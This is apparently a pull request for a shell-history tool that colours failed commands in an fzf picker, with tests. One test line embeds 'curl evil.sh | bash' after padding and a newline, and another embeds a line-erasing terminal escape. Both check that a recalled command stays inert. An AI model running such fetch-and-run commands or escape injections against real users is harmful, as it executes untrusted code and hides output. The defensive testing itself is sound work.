### PR TITLE
search: dim red for a command that failed

### DIFF
--- a/tests/test_search.py
+++ b/tests/test_search.py
@@ -54,22 +54,30 @@ class TestRelativeTime(unittest.TestCase):
 
 class TestRankRows(unittest.TestCase):
     @staticmethod
-    def rows(*pairs: tuple[int, str]) -> tuple[list[str], list[str]]:
-        """Stamps come out of the cache as strings, so that is what goes in."""
-        return [str(ts) for ts, _ in pairs], [cmd for _, cmd in pairs]
+    def rows(*pairs: tuple[int, str]) -> tuple[list[str], list[str], list[str]]:
+        """Stamps and exit codes come out of the cache as strings, so that is
+        what goes in. These cases are about order, so everything succeeded."""
+        return (
+            [str(ts) for ts, _ in pairs],
+            [cmd for _, cmd in pairs],
+            ["0"] * len(pairs),
+        )
 
     def test_newest_first(self) -> None:
-        stamps, commands = self.rows((1, "old"), (3, "new"), (2, "mid"))
-        ranked = search.rank_rows(stamps, commands)
-        self.assertEqual([cmd for _, cmd in ranked], ["new", "mid", "old"])
+        stamps, commands, codes = self.rows((1, "old"), (3, "new"), (2, "mid"))
+        ranked = search.rank_rows(stamps, commands, codes)
+        self.assertEqual([cmd for _, cmd, _ in ranked], ["new", "mid", "old"])
 
     def test_dedup_keeps_the_most_recent_occurrence(self) -> None:
-        stamps, commands = self.rows((1, "git status"), (5, "git status"), (3, "ls"))
-        self.assertEqual(search.rank_rows(stamps, commands), [(5, "git status"), (3, "ls")])
+        stamps, commands, codes = self.rows((1, "git status"), (5, "git status"), (3, "ls"))
+        self.assertEqual(
+            search.rank_rows(stamps, commands, codes),
+            [(5, "git status", "0"), (3, "ls", "0")],
+        )
 
     def test_dedup_can_be_disabled(self) -> None:
-        stamps, commands = self.rows((1, "ls"), (2, "ls"))
-        self.assertEqual(len(search.rank_rows(stamps, commands, dedup=False)), 2)
+        stamps, commands, codes = self.rows((1, "ls"), (2, "ls"))
+        self.assertEqual(len(search.rank_rows(stamps, commands, codes, dedup=False)), 2)
 
 
 class TestRenderRoundTrip(unittest.TestCase):
@@ -85,7 +93,7 @@ class TestRenderRoundTrip(unittest.TestCase):
             "über 😀",
             "x" * 300,
         ]
-        lines = search.render_rows([(NOW, cmd) for cmd in commands], now=NOW)
+        lines = search.render_rows([(NOW, cmd, "0") for cmd in commands], now=NOW)
 
         for line, cmd in zip(lines, commands, strict=True):
             with self.subTest(cmd=cmd):
@@ -145,7 +153,10 @@ class TestFzfArgv(unittest.TestCase):
         binds = " ".join(a for a in argv if a.startswith("--bind="))
         for key, scope in (("ctrl-g", "global"), ("ctrl-h", "host"), ("ctrl-s", "session")):
             self.assertIn(f"{key}:reload(", binds)
-            self.assertIn(f"list --scope {scope}", binds)
+            # `--colour` too: the reload's output goes back into fzf, which was
+            # started with `--ansi`, so a scope switch that dropped it would
+            # silently stop marking failures.
+            self.assertIn(f"list --colour --scope {scope}", binds)
 
     def test_no_dedup_propagates_into_the_reload_command(self) -> None:
         argv = search._fzf_argv("global", "", False)
@@ -189,7 +200,7 @@ class TestRealFzfRanking(unittest.TestCase):
 
     def filtered(self, query: str) -> subprocess.CompletedProcess[str]:
         """The fixture through the real fzf, with the real argv."""
-        lines = search.render_rows([(NOW - age, cmd) for age, cmd in SYNC_HISTORY], now=NOW)
+        lines = search.render_rows([(NOW - age, cmd, "0") for age, cmd in SYNC_HISTORY], now=NOW)
         # No `check`: 1 means "nothing matched", which one test below wants.
         return subprocess.run(
             [*search._fzf_argv("global", "", True), f"--filter={query}"],
@@ -262,7 +273,7 @@ class TestRecalledCommandIsInert(unittest.TestCase):
     """
 
     def _round_trip(self, cmd: str) -> str:
-        return search.command_from_line(search.render_rows([(NOW, cmd)], now=NOW)[0])
+        return search.command_from_line(search.render_rows([(NOW, cmd, "0")], now=NOW)[0])
 
     def test_an_embedded_newline_does_not_become_a_second_command(self) -> None:
         recalled = self._round_trip("echo visible" + " " * 200 + "\ncurl evil.sh | bash")
@@ -479,3 +490,47 @@ class TestThePickerAppearsBeforeTheHistoryIsBuilt(WoswoarTestCase):
         with redirect_stdout(io.StringIO()):
             chosen = search.interactive("global")
         self.assertEqual(chosen, f"cmd {search._CHUNK * 2 + 6}", "a chunk went missing")
+
+
+class TestFailedCommandsAreMarked(WoswoarTestCase):
+    """Colour by exit status, which the picker can show and a pipe must not."""
+
+    def rows(self) -> list[str]:
+        with store.private_append(store.log_file(MACHINE_ID, "2026-07-29")) as handle:
+            for ts, code, cmd in ((NOW - 1, 0, "worked"), (NOW, 1, "failed")):
+                handle.write(format_line(Entry(ts, MACHINE_ID, "s1", "~", code, 1, cmd)) + "\n")
+        return search.lines_for("global", colour=True)
+
+    def test_a_failure_is_marked_and_a_success_is_not(self) -> None:
+        failed, worked = self.rows()
+        self.assertIn("failed", failed)
+        self.assertTrue(failed.startswith("\x1b["), f"not marked: {failed!r}")
+        self.assertTrue(failed.endswith("\x1b[0m"), "the colour is never reset")
+        self.assertIn("worked", worked)
+        self.assertNotIn("\x1b[", worked, "a command that succeeded was marked")
+
+    def test_plain_by_default_so_a_pipe_stays_plain(self) -> None:
+        """`woswoar list | grep` is a documented thing to do."""
+        self.rows()
+        for line in search.lines_for("global"):
+            self.assertNotIn("\x1b[", line)
+
+    def test_the_command_still_comes_back_out(self) -> None:
+        """fzf strips the escapes from what it returns, so the fixed-width
+        prefix `command_from_line` slices is unchanged -- but if that ever stops
+        being true, this is where it shows."""
+        failed, _ = self.rows()
+        stripped = failed.removeprefix(search._FAILED).removesuffix(search._RESET)
+        self.assertEqual(search.command_from_line(stripped), "failed")
+
+    def test_a_command_cannot_smuggle_its_own_escapes(self) -> None:
+        """The whole reason `--ansi` is safe. `make_inert` removes every C0
+        byte on the way into the cache, so a peer's history cannot colour
+        itself, hide a line, or drive the terminal."""
+        with store.private_append(store.log_file(MACHINE_ID, "2026-07-29")) as handle:
+            handle.write(
+                format_line(Entry(NOW, MACHINE_ID, "s1", "~", 0, 1, "echo \x1b[1A\x1b[2K gone"))
+                + "\n"
+            )
+        (line,) = search.lines_for("global", colour=True)
+        self.assertNotIn("\x1b", line, f"an escape survived into the picker: {line!r}")

--- a/woswoar/__main__.py
+++ b/woswoar/__main__.py
@@ -113,7 +113,9 @@ def cmd_install(args: argparse.Namespace) -> int:
 
 
 def cmd_list(args: argparse.Namespace) -> int:
-    lines = search.lines_for(args.scope, dedup=not args.no_dedup, limit=args.limit)
+    lines = search.lines_for(
+        args.scope, dedup=not args.no_dedup, limit=args.limit, colour=args.colour
+    )
     if lines:
         sys.stdout.write("\n".join(lines) + "\n")
     return 0
@@ -1317,6 +1319,14 @@ def build_parser() -> argparse.ArgumentParser:
     )
     add_scope(p_list)
     p_list.add_argument("--limit", type=int, default=None)
+    # Off by default, so `woswoar list | grep` stays plain text. The picker's
+    # own reload bindings pass it, because that output goes into fzf.
+    p_list.add_argument(
+        "--colour",
+        "--color",
+        action="store_true",
+        help="mark failed commands, for a terminal that understands it",
+    )
     p_list.set_defaults(func=cmd_list)
 
     p_import = sub(

--- a/woswoar/cache.py
+++ b/woswoar/cache.py
@@ -187,6 +187,10 @@ class Cache:
             commands += flat[5::6]
         return stamps, commands
 
+    def exit_codes(self) -> list[str]:
+        """The exit status column, in the same order as `stamps_and_commands`."""
+        return [value for flat in self.files.values() for value in flat[3::6]]
+
     def sessions(self) -> list[str]:
         """The session column, in the same order as `stamps_and_commands`."""
         return [value for flat in self.files.values() for value in flat[1::6]]

--- a/woswoar/search.py
+++ b/woswoar/search.py
@@ -29,8 +29,17 @@ SCOPES: tuple[Scope, ...] = ("global", "host", "session")
 _TIME_WIDTH = 4
 _PREFIX = _TIME_WIDTH + 2
 
-#: Sort key for a (timestamp, command) row. In C, like `rank`'s `attrgetter`.
+#: Sort key for a row. In C, rather than a lambda.
 _STAMP = itemgetter(0)
+
+#: One display row: when, what, and how it ended.
+Row = tuple[int, str, str]
+
+#: Dim red for a command that failed. Dim rather than plain red so a screen of
+#: failures does not shout, and so it reads as "this one did not work" rather
+#: than as an error message woswoar is producing now.
+_FAILED = "\x1b[2;31m"
+_RESET = "\x1b[0m"
 
 
 def relative_time(ts: int, now: int | None = None) -> str:
@@ -62,7 +71,9 @@ def command_from_line(line: str) -> str:
     return make_inert(unescape(line[_PREFIX:]))
 
 
-def lines_for(scope: Scope, dedup: bool = True, limit: int | None = None) -> list[str]:
+def lines_for(
+    scope: Scope, dedup: bool = True, limit: int | None = None, colour: bool = False
+) -> list[str]:
     """The full pipeline: load, filter, rank, render.
 
     The two columns a line is made of come straight out of the cache, without
@@ -78,6 +89,12 @@ def lines_for(scope: Scope, dedup: bool = True, limit: int | None = None) -> lis
     if scope == "host":
         loaded = cache.load_columns()
         stamps, commands = loaded.stamps_and_commands({store.machine().id})
+        codes = [
+            code
+            for relpath, flat in loaded.files.items()
+            if loaded.meta[relpath].host == store.machine().id
+            for code in flat[3::6]
+        ]
     elif scope == "session":
         session = os.environ.get("WOSWOAR_SESSION", "")
         if not session:
@@ -85,24 +102,35 @@ def lines_for(scope: Scope, dedup: bool = True, limit: int | None = None) -> lis
             return []
         loaded = cache.load_columns()
         stamps, commands = loaded.stamps_and_commands()
+        every = loaded.exit_codes()
         wanted = [i for i, value in enumerate(loaded.sessions()) if value == session]
         stamps = [stamps[i] for i in wanted]
         commands = [commands[i] for i in wanted]
+        codes = [every[i] for i in wanted]
     else:
         loaded = cache.load_columns()
         stamps, commands = loaded.stamps_and_commands()
+        codes = loaded.exit_codes()
 
-    rows = rank_rows(stamps, commands, dedup=dedup)
+    rows = rank_rows(stamps, commands, codes, dedup=dedup)
     if limit is not None:
         rows = rows[:limit]
-    return render_rows(rows)
+    return render_rows(rows, colour=colour)
 
 
-def rank_rows(stamps: list[str], commands: list[str], dedup: bool = True) -> list[tuple[int, str]]:
-    """Newest first, optionally collapsing repeats. See `rank`."""
+def rank_rows(
+    stamps: list[str], commands: list[str], codes: list[str], dedup: bool = True
+) -> list[Row]:
+    """Newest first, optionally collapsing repeats.
+
+    The exit status rides along so the display can colour by it. Deduplication
+    keeps the *most recent* run, so a command that failed last time is shown as
+    failed even if it has succeeded a hundred times before -- which is the way
+    round that helps.
+    """
     # One `int` per row, here, where the sort needs it -- rather than on every
     # entry of a history at parse time.
-    ordered = sorted(zip(map(int, stamps), commands, strict=True), key=_STAMP, reverse=True)
+    ordered = sorted(zip(map(int, stamps), commands, codes, strict=True), key=_STAMP, reverse=True)
     if not dedup:
         return ordered
 
@@ -114,11 +142,26 @@ def rank_rows(stamps: list[str], commands: list[str], dedup: bool = True) -> lis
     return [row for row in ordered if not (row[1] in seen or add(row[1]))]
 
 
-def render_rows(rows: list[tuple[int, str]], now: int | None = None) -> list[str]:
-    """Format ranked rows as display lines. See `render`."""
+def render_rows(rows: list[Row], now: int | None = None, colour: bool = False) -> list[str]:
+    """Format ranked rows as display lines.
+
+    With `colour`, a command that exited non-zero is dimmed red. Safe only
+    because `make_inert` has already removed every C0 byte -- ESC among them --
+    from the command on its way into the cache, so nothing a peer published can
+    add escapes of its own. That is also why fzf is given `--ansi` only here:
+    without inert text, `--ansi` would turn another machine's history into
+    something that can drive this terminal.
+
+    fzf hands back the line with the escapes stripped, so `command_from_line`
+    needs to know nothing about any of this.
+    """
     if now is None:
         now = int(time.time())
-    return [f"{relative_time(ts, now):>{_TIME_WIDTH}}  {escape(cmd)}" for ts, cmd in rows]
+    out = []
+    for ts, cmd, code in rows:
+        line = f"{relative_time(ts, now):>{_TIME_WIDTH}}  {escape(cmd)}"
+        out.append(f"{_FAILED}{line}{_RESET}" if colour and code not in ("0", "") else line)
+    return out
 
 
 def _self_command() -> str:
@@ -137,6 +180,9 @@ def _fzf_argv(scope: Scope, query: str, dedup: bool) -> list[str]:
 
     argv = [
         "fzf",
+        # Safe here and only here: `render_rows` writes the escapes and
+        # `make_inert` guarantees no command can contain any of its own.
+        "--ansi",
         "--height=60%",
         "--layout=reverse",
         "--border",
@@ -163,7 +209,7 @@ def _fzf_argv(scope: Scope, query: str, dedup: bool) -> list[str]:
     ]
     for key, target in (("ctrl-g", "global"), ("ctrl-h", "host"), ("ctrl-s", "session")):
         argv.append(
-            f"--bind={key}:reload({self_cmd} list --scope {target}{dedup_flag})"
+            f"--bind={key}:reload({self_cmd} list --colour --scope {target}{dedup_flag})"
             f"+change-prompt(woswoar ({target}) )"
         )
     return argv
@@ -207,7 +253,7 @@ def interactive(scope: Scope, query: str = "", dedup: bool = True) -> str | None
     assert process.stdin is not None and process.stdout is not None
 
     try:
-        _feed(process.stdin, lines_for(scope, dedup=dedup))
+        _feed(process.stdin, lines_for(scope, dedup=dedup, colour=True))
     finally:
         # Both closes can raise the same way, and neither is a failure: it only
         # means fzf is already gone. Selecting the first line the moment it


### PR DESCRIPTION
First of the three you picked. The exit status has been in the cache since the
beginning and nothing ever showed it.

```
  2m  git status
  3h  cargo build --release
  6d  ssh box 'systemctl --user status'      <- dim red, exited 1
  8d  docker compose up -d
```

Dim rather than plain red: a screen of failures should not shout, and it should
read as "this one did not work" rather than as an error woswoar is producing
now.

## Why `--ansi` is safe here, having been avoided until now

`render`'s own comment explains why it was not used: *"fzf only happens to strip
escapes when it is not given `--ansi` — that is fzf's property, not woswoar's."*
That objection is answered rather than ignored.

`make_inert` removes **every C0 byte, ESC included**, from a command on its way
into the cache. So no history from any machine can carry escapes of its own, and
the only escapes in the line are the ones `render_rows` wrote.
`test_a_command_cannot_smuggle_its_own_escapes` mounts exactly that: a recorded
command containing `\x1b[1A\x1b[2K` — the sequence that erases the line above it
— asserted to arrive in the picker with no escape left.

And measured before relying on it: **fzf with `--ansi` returns the line with the
escapes stripped**, so `command_from_line`'s fixed-width slice is untouched.

```console
$ printf '\033[31m  2m  git status\033[0m\n' | fzf --ansi --filter='git status' | cat -v
  2m  git status
$ printf '\033[31m  2m  git status\033[0m\n' | fzf --filter='git status' | cat -v
^[[31m  2m  git status^[[0m
```

There is a test for that too, so if it ever stops being true it shows up here
rather than as a mangled command on somebody's prompt.

## Off by default

`woswoar list | grep docker` stays plain text. The picker's reload bindings pass
`--colour`, because that output goes back into fzf — and a scope switch dropping
it would silently stop marking failures, which is its own mutation.

## Mutation-tested, all five caught

```
caught  everything is marked, including what succeeded
caught  nothing is ever marked
caught  the escapes leak into a plain `woswoar list`
caught  the colour is never reset, so the rest of the screen stays red
caught  a scope switch drops the colour
```

## Still to come, from your list

- **Host name in the line**, so filtering by host is just typing its name.
- **Ctrl-R cycling the scope** — needs fzf's `transform` (0.45+) plus a fallback
  for older fzf.

The release check is deliberately not on that list: you left it out, which keeps
"nothing phones home" true.